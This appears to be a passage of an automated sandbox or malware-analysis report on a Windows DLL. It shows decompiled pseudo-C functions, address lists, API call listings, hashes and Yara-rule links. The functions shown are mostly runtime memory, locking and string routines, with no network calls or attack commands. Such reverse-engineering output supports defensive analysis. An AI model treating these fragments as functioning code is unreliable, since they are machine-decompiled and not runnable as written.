					E677039E8(_t40, _t46, _t58, _t60, _t88, _t74);
					_t28 = _t73 + _t73 * 4;
				} while (_t44 - _t28 != r15d);
				if(_t86 != 0) {
					free();
				}
				return _t28;
			}























                                                                                                                                                  0x67705210
                                                                                                                                                  0x67705210
                                                                                                                                                  0x67705210
                                                                                                                                                  0x67705210
                                                                                                                                                  0x67705210
                                                                                                                                                  0x67705210
                                                                                                                                                  0x67705215
                                                                                                                                                  0x6770521a
                                                                                                                                                  0x6770522c
                                                                                                                                                  0x67705231
                                                                                                                                                  0x67705236
                                                                                                                                                  0x6770523e
                                                                                                                                                  0x67705242
                                                                                                                                                  0x67705244
                                                                                                                                                  0x6770524b
                                                                                                                                                  0x6770524d
                                                                                                                                                  0x6770524d
                                                                                                                                                  0x6770524f
                                                                                                                                                  0x67705255
                                                                                                                                                  0x6770525c
                                                                                                                                                  0x6770525c
                                                                                                                                                  0x6770525e
                                                                                                                                                  0x6770526a
                                                                                                                                                  0x6770526f
                                                                                                                                                  0x67705272
                                                                                                                                                  0x67705272
                                                                                                                                                  0x67705275
                                                                                                                                                  0x6770527a
                                                                                                                                                  0x6770527a
                                                                                                                                                  0x6770527f
                                                                                                                                                  0x67705284
                                                                                                                                                  0x67705286
                                                                                                                                                  0x6770528e
                                                                                                                                                  0x6770529c
                                                                                                                                                  0x677052a4
                                                                                                                                                  0x677052a7
                                                                                                                                                  0x677052af
                                                                                                                                                  0x677052b2
                                                                                                                                                  0x677052ba
                                                                                                                                                  0x677052bc
                                                                                                                                                  0x677052c0
                                                                                                                                                  0x677052c3
                                                                                                                                                  0x677052cd
                                                                                                                                                  0x677052d2
                                                                                                                                                  0x677052d2
                                                                                                                                                  0x677052d6
                                                                                                                                                  0x677052d9
                                                                                                                                                  0x677052d9
                                                                                                                                                  0x677052c3
                                                                                                                                                  0x677052e1
                                                                                                                                                  0x677052f0
                                                                                                                                                  0x677052f5
                                                                                                                                                  0x67705301
                                                                                                                                                  0x67705306
                                                                                                                                                  0x67705306
                                                                                                                                                  0x6770532a

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 67705342
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 6770534C
                                                                                                                                                    • Part of subcall function 6770532C: CryptGenRandom.ADVAPI32(?,?,00000000,67704A26,?,?,?,6770147B), ref: 67705366
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 67705373
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 6770537B
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • free.LIBCMT ref: 6770527A
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,67704A8B,?,?,?,6770147B), ref: 67705291
                                                                                                                                                  • free.LIBCMT ref: 67705306
                                                                                                                                                  Strings
                                                                                                                                                  • b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435, xrefs: 67705263
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$malloc$CryptRandomlstrlen
                                                                                                                                                  • String ID: b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435
                                                                                                                                                  • API String ID: 3087790110-3477985423
                                                                                                                                                  • Opcode ID: 98925b826af543e02aec34c3d5800443f6911f5814b73e28249f417ca8015389
                                                                                                                                                  • Instruction ID: e3d83da69033a150f90ac453bccc137c1054b7d38128827ecd01ceacd18a7b01
                                                                                                                                                  • Opcode Fuzzy Hash: 98925b826af543e02aec34c3d5800443f6911f5814b73e28249f417ca8015389
                                                                                                                                                  • Instruction Fuzzy Hash: A12102F261865545CA05DB72BA24A2E73D1BB8CFDCF484535DE5A87308DF38C482C740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770A378, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E6770A378(void* __ecx, void* __edx, void* __eflags, long long __rax, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, long long _a8, long long _a16) {
				void* _t15;
				long long _t26;
				long long _t28;
				long long _t31;
				void* _t35;
				long long _t36;
				void* _t42;

				_t35 = __rdx;
				_t26 = __rax;
				_a16 = __rbx;
				_t15 = E67708E40(__ecx, __eflags, __rax, __rcx, __rsi, _t42);
				_t36 = _t26;
				if(( *0x677166d0 &  *(_t26 + 0xc8)) == 0 ||  *((long long*)(_t26 + 0xc0)) == 0) {
					E6770CFB0();
					_t31 =  *((intOrPtr*)(_t36 + 0xb8));
					_a8 = _t31;
					__eflags = _t31 -  *0x677165d0; // 0x1dea9f11c50
					if(__eflags != 0) {
						__eflags = _t31;
						if(__eflags != 0) {
							asm("lock dec dword [ebx]");
							if(__eflags == 0) {
								__eflags = _a8 - 0x677161a0;
								if(_a8 != 0x677161a0) {
									free();
								}
							}
						}
						_t28 =  *0x677165d0; // 0x1dea9f11c50
						 *((long long*)(_t36 + 0xb8)) = _t28;
						_t26 =  *0x677165d0; // 0x1dea9f11c50
						_a8 = _t26;
						asm("lock inc dword [eax]");
						_t31 = _a8;
					}
					E6770CEB0();
				} else {
					_t31 =  *((intOrPtr*)(_t26 + 0xb8));
				}
				if(_t31 == 0) {
					_t15 = E67708998(_t31 + 0x20, _t26, _t31, _t35, _t42);
				}
				return _t15;
			}










                                                                                                                                                  0x6770a378
                                                                                                                                                  0x6770a378
                                                                                                                                                  0x6770a378
                                                                                                                                                  0x6770a382
                                                                                                                                                  0x6770a387
                                                                                                                                                  0x6770a396
                                                                                                                                                  0x6770a3b0
                                                                                                                                                  0x6770a3b6
                                                                                                                                                  0x6770a3bd
                                                                                                                                                  0x6770a3c2
                                                                                                                                                  0x6770a3c9
                                                                                                                                                  0x6770a3cb
                                                                                                                                                  0x6770a3ce
                                                                                                                                                  0x6770a3d0
                                                                                                                                                  0x6770a3d3
                                                                                                                                                  0x6770a3e1
                                                                                                                                                  0x6770a3e4
                                                                                                                                                  0x6770a3e6
                                                                                                                                                  0x6770a3e6
                                                                                                                                                  0x6770a3e4
                                                                                                                                                  0x6770a3d3
                                                                                                                                                  0x6770a3eb
                                                                                                                                                  0x6770a3f2
                                                                                                                                                  0x6770a3f9
                                                                                                                                                  0x6770a400
                                                                                                                                                  0x6770a405
                                                                                                                                                  0x6770a408
                                                                                                                                                  0x6770a408
                                                                                                                                                  0x6770a412
                                                                                                                                                  0x6770a3a2
                                                                                                                                                  0x6770a3a2
                                                                                                                                                  0x6770a3a2
                                                                                                                                                  0x6770a41a
                                                                                                                                                  0x6770a41f
                                                                                                                                                  0x6770a41f
                                                                                                                                                  0x6770a431

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _amsg_exit$_getptd_lockfree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2148533958-0
                                                                                                                                                  • Opcode ID: 1f830674621c51ba1bc1e6a36162d468c69f7b3b28e25e91fb57b38596e397c3
                                                                                                                                                  • Instruction ID: 22ba6d0d473abe82653ea2011082bb650febb70a6874040c882dbceb1c5ba050
                                                                                                                                                  • Opcode Fuzzy Hash: 1f830674621c51ba1bc1e6a36162d468c69f7b3b28e25e91fb57b38596e397c3
                                                                                                                                                  • Instruction Fuzzy Hash: CC117CB6219A4086EB858F11E690769B3B5F79CB88F8D4536EB5E43394EF38C464C701
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67708CDC, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FlsFree.KERNEL32(?,?,?,?,677081B6), ref: 67708CEB
                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,677081B6), ref: 6770CE5B
                                                                                                                                                  • free.LIBCMT ref: 6770CE64
                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,677081B6), ref: 6770CE8B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalDeleteSection$Freefree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1250194111-0
                                                                                                                                                  • Opcode ID: 9c77229c8bfb909e25b25d97494fb18b1eb2273c6a86055bc29b4cf35110ce2e
                                                                                                                                                  • Instruction ID: 191759ab92b5e5b86047cfb66a73a91df034684dd186236ea1e6e15f1fb308be
                                                                                                                                                  • Opcode Fuzzy Hash: 9c77229c8bfb909e25b25d97494fb18b1eb2273c6a86055bc29b4cf35110ce2e
                                                                                                                                                  • Instruction Fuzzy Hash: 3411A172B08A40CAEB14CF25F95039C73B0F759FA9F9C0B21EA69066A5DF38C1A1D711
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770FCC8, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _lock.LIBCMT ref: 6770FCDC
                                                                                                                                                    • Part of subcall function 6770CFB0: _amsg_exit.LIBCMT ref: 6770CFDA
                                                                                                                                                  • fclose.LIBCMT ref: 6770FD0C
                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6770E4DF), ref: 6770FD30
                                                                                                                                                  • free.LIBCMT ref: 6770FD41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 594724896-0
                                                                                                                                                  • Opcode ID: 850a4869c85a3278d486906de5bfc3539866bfd6c262086510a1c844322445db
                                                                                                                                                  • Instruction ID: a377bdb0ea30b0196efa662af38cbc3a60bf16401668a67187e9750ade3f9795
                                                                                                                                                  • Opcode Fuzzy Hash: 850a4869c85a3278d486906de5bfc3539866bfd6c262086510a1c844322445db
                                                                                                                                                  • Instruction Fuzzy Hash: 8411A072128A4082D7009F15E59435EB3A1F788B9CF544726DBAE83774CF35C463CB08
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770AC48, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E6770AC48(void* __ecx, void* __edx, void* __eflags, intOrPtr __rax, void* __rcx, intOrPtr __rdx, void* __rdi, void* __rsi, void* __r8) {
				void* __rbx;
				void* _t9;
				intOrPtr _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t26;
				void* _t27;

				_t29 = __r8;
				_t28 = __rsi;
				_t27 = __rdi;
				_t26 = __rdx;
				_t20 = __rax;
				E67708E40(__ecx, __eflags, __rax, __rcx, __rsi, __r8);
				_t22 = _t20;
				_t11 =  *(_t20 + 0xc8);
				if(( *0x677166d0 &  *(_t20 + 0xc8)) == 0) {
					L3:
					E6770CFB0();
					_t6 = _t22 + 0xc0; // 0xc0
					_t26 =  *0x67716b00; // 0x677169a0
					_t9 = E6770ABF0(0xc, _t20, _t6, _t26, _t27, _t28);
					_t23 = _t20;
					E6770CEB0();
				} else {
					_t18 =  *((long long*)(_t20 + 0xc0));
					if( *((long long*)(_t20 + 0xc0)) == 0) {
						goto L3;
					} else {
						_t9 = E67708E40(_t11, _t18, _t20, __rcx, __rsi, __r8);
						_t23 =  *((intOrPtr*)(_t20 + 0xc0));
					}
				}
				if(_t23 == 0) {
					_t7 = _t23 + 0x20; // 0x20
					_t9 = E67708998(_t7, _t20, _t23, _t26, _t29);
				}
				return _t9;
			}










                                                                                                                                                  0x6770ac48
                                                                                                                                                  0x6770ac48
                                                                                                                                                  0x6770ac48
                                                                                                                                                  0x6770ac48
                                                                                                                                                  0x6770ac48
                                                                                                                                                  0x6770ac4e
                                                                                                                                                  0x6770ac53
                                                                                                                                                  0x6770ac56
                                                                                                                                                  0x6770ac62
                                                                                                                                                  0x6770ac7c
                                                                                                                                                  0x6770ac81
                                                                                                                                                  0x6770ac87
                                                                                                                                                  0x6770ac8e
                                                                                                                                                  0x6770ac95
                                                                                                                                                  0x6770ac9a
                                                                                                                                                  0x6770aca2
                                                                                                                                                  0x6770ac64
                                                                                                                                                  0x6770ac64
                                                                                                                                                  0x6770ac6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ac6e
                                                                                                                                                  0x6770ac6e
                                                                                                                                                  0x6770ac73
                                                                                                                                                  0x6770ac73
                                                                                                                                                  0x6770ac6c
                                                                                                                                                  0x6770acaa
                                                                                                                                                  0x6770acac
                                                                                                                                                  0x6770acaf
                                                                                                                                                  0x6770acaf
                                                                                                                                                  0x6770acbc

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _amsg_exit_getptd$_lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3670291111-0
                                                                                                                                                  • Opcode ID: 5008369884dd3ea197a81e4c0bf28ec378785097752cbd95a0ecc356c34250b2
                                                                                                                                                  • Instruction ID: 561cb8a9f66b51d9a679b0e8e619697007881f7f02550b25f3a4766420925f31
                                                                                                                                                  • Opcode Fuzzy Hash: 5008369884dd3ea197a81e4c0bf28ec378785097752cbd95a0ecc356c34250b2
                                                                                                                                                  • Instruction Fuzzy Hash: 09F012F1215640C6EB44AB61CA54BAA27E2E75DB48F4E5639CF4C4B391EF289454C312
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67705A50, Relevance: 5.1, APIs: 4, Instructions: 56stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E67705A50(void* __edi, void* __ebp, void* __esp, long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
				void* _t16;
				void* _t18;
				int _t24;
				long long _t42;
				long long _t44;
				intOrPtr* _t59;
				long long _t60;
				void* _t61;
				long long _t63;
				void* _t66;
				long long _t68;

				_t44 = __rbx;
				_t42 = _t63;
				 *((long long*)(_t42 + 8)) = __rbx;
				 *((long long*)(_t42 + 0x10)) = _t60;
				 *((long long*)(_t42 + 0x18)) = __rsi;
				 *((long long*)(_t42 + 0x20)) = __rdi;
				_t61 = __rcx;
				if(__rcx != 0) {
					E67707758(_t16, __rcx, "/");
					_t68 = _t42;
					if(_t42 == 0) {
						goto L1;
					} else {
						r12d = r12d - __ebp;
						malloc(??);
						_t59 = _t42;
						memset(__edi, 0, 0x10 << 0);
						_t6 = _t68 + 1; // 0x1
						malloc(??);
						r8d = r12d;
						 *_t59 = _t42;
						E6770ED80(_t6, _t42, __rcx, _t66);
						 *((char*)(_t68 +  *_t59)) = 0;
						_t24 = lstrlenA(??);
						_t8 = _t44 - 0xf; // 0x1
						malloc(??);
						_t10 = _t61 + 1; // 0x1
						r8d = _t24 + _t8 - r12d;
						 *((long long*)(_t59 + 8)) = _t42;
						_t18 = E6770ED80(_t24 + _t8 - r12d, _t42, _t68 + _t10, _t66);
					}
				} else {
					L1:
					_t18 = 0;
				}
				return _t18;
			}














                                                                                                                                                  0x67705a50
                                                                                                                                                  0x67705a50
                                                                                                                                                  0x67705a53
                                                                                                                                                  0x67705a57
                                                                                                                                                  0x67705a5b
                                                                                                                                                  0x67705a5f
                                                                                                                                                  0x67705a69
                                                                                                                                                  0x67705a6f
                                                                                                                                                  0x67705a7f
                                                                                                                                                  0x67705a84
                                                                                                                                                  0x67705a8a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67705a8c
                                                                                                                                                  0x67705a91
                                                                                                                                                  0x67705a96
                                                                                                                                                  0x67705aa0
                                                                                                                                                  0x67705aa5
                                                                                                                                                  0x67705aa7
                                                                                                                                                  0x67705aac
                                                                                                                                                  0x67705ab1
                                                                                                                                                  0x67705aba
                                                                                                                                                  0x67705abd
                                                                                                                                                  0x67705ac8
                                                                                                                                                  0x67705acd
                                                                                                                                                  0x67705ad3
                                                                                                                                                  0x67705adf
                                                                                                                                                  0x67705ae4
                                                                                                                                                  0x67705ae9
                                                                                                                                                  0x67705aef
                                                                                                                                                  0x67705af3
                                                                                                                                                  0x67705af8
                                                                                                                                                  0x67705a71
                                                                                                                                                  0x67705a71
                                                                                                                                                  0x67705a71
                                                                                                                                                  0x67705a71
                                                                                                                                                  0x67705b15

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc$lstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2312681527-0
                                                                                                                                                  • Opcode ID: 3b65868fae9ddfab263b33ab46ef0d5ab2ba2e5fc3c800b50b5017a6a471a3d9
                                                                                                                                                  • Instruction ID: d3910ee103dbb318a207443fd26702f20a76dc875c11c2ee6fecbc21da09ba2b
                                                                                                                                                  • Opcode Fuzzy Hash: 3b65868fae9ddfab263b33ab46ef0d5ab2ba2e5fc3c800b50b5017a6a471a3d9
                                                                                                                                                  • Instruction Fuzzy Hash: 58118BB2315B8489DA04DF6AE9986197BE5E748BC8B485438DB8987714EF78D560C340
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67701160, Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                  • MultiByteToWideChar.KERNEL32 ref: 67701190
                                                                                                                                                  • malloc.LIBCMT ref: 6770119E
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • MultiByteToWideChar.KERNEL32 ref: 677011BD
                                                                                                                                                  • free.LIBCMT ref: 677011C6
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$ByteCharHeapMultiWidemalloc$AllocateErrorFreeLast_callnewhfree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1319628078-0
                                                                                                                                                  • Opcode ID: 462a371da138747dd907135aaf950cafe076fe47f33da5cba7aae61f61853cd5
                                                                                                                                                  • Instruction ID: ba2ab192446126eaccf5eb48dc20303a8aa8c303c7d1dca2d5aec1d6c75e3ee3
                                                                                                                                                  • Opcode Fuzzy Hash: 462a371da138747dd907135aaf950cafe076fe47f33da5cba7aae61f61853cd5
                                                                                                                                                  • Instruction Fuzzy Hash: F7F08176708B8082E7209B66B55431AABA2F7CDBE9F144325DBA947B98DF3CC2518704
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67703038, Relevance: 5.0, APIs: 4, Instructions: 31stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                                  			E67703038(void* __ecx, void* __edi, void* __esp, long long __rbx, void* _a4, long long _a16) {
				signed long long _v24;
				signed int _v36;
				void* _v456;
				signed long long _t26;
				void* _t41;

				_a16 = __rbx;
				_t26 =  *0x67716000; // 0x9b7b11e8241
				_v24 = _t26 ^ _t41 - 0x000001e0;
				r8d = __ecx;
				wsprintfA(??, ??);
				lstrlenA(??);
				malloc(??);
				lstrcpyA(??, ??);
				memset(__edi, 0, 0x1af << 0);
				return E67706F80(0, _v36 ^ _t41 - 0x000001e0);
			}








                                                                                                                                                  0x67703038
                                                                                                                                                  0x67703045
                                                                                                                                                  0x6770304f
                                                                                                                                                  0x67703057
                                                                                                                                                  0x67703066
                                                                                                                                                  0x67703071
                                                                                                                                                  0x6770307c
                                                                                                                                                  0x6770308c
                                                                                                                                                  0x6770309e
                                                                                                                                                  0x677030c3

                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfA.USER32 ref: 67703066
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67703071
                                                                                                                                                  • malloc.LIBCMT ref: 6770307C
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 6770308C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$AllocateHeap_callnewhlstrcpylstrlenmallocwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2852548402-0
                                                                                                                                                  • Opcode ID: bc521239d78a99047156b8308457ec1cce998b2d052ce7674b960bba7f4dae8f
                                                                                                                                                  • Instruction ID: 6bac251c55be47c11b8754a06c921d3cf7932975ee9f64175997fcc132e9cdfa
                                                                                                                                                  • Opcode Fuzzy Hash: bc521239d78a99047156b8308457ec1cce998b2d052ce7674b960bba7f4dae8f
                                                                                                                                                  • Instruction Fuzzy Hash: 28F01D32318A8585DA21CB14F85439AA3A1F78C78CFC505269A8E4A718EE3DC259CB40
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%